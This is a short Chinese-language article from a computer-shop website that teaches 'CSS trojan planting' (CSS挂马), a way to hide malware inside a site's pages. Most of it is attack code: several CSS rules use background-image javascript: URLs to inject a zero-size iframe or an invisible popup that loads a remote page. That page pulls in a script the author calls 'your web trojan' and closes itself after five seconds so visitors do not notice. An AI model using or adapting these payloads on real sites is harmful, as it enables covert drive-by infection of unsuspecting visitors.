系统城装机大师 - 固镇县祥瑞电脑科技销售部宣传站!

当前位置:首页 > 网络知识 > 网络安全 > 详细页面

真正能用,还有点效果的CSS挂马代码的方法

时间:2020-02-02来源:系统城作者:电脑系统城

真正能用,还有点效果的CSS挂马代码的方法


网上流行的: 
body 
{  
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")') 

//此方法会使主页不正常.返回一片空白. 
用弹窗. 
body 
{  
background-image: url('javascript:open("http://192.168.0.5/test.htm")') 

//弹出一个框.难看 易被发现. 
改进一下: 

body 
{  
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no')) 

test.htm里面的代码,a.js为你的网马,弹出一个不可见的窗口,并在5秒自动后关闭没提示: 
<script src="a.js"></script> 
<script> 
window.opener=null;setTimeout("window.close();",5000); 
</script>  
a.js内容: 
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>');  
分享到:

相关信息

系统教程栏目

栏目热门教程

人气教程排行

站长推荐

热门系统下载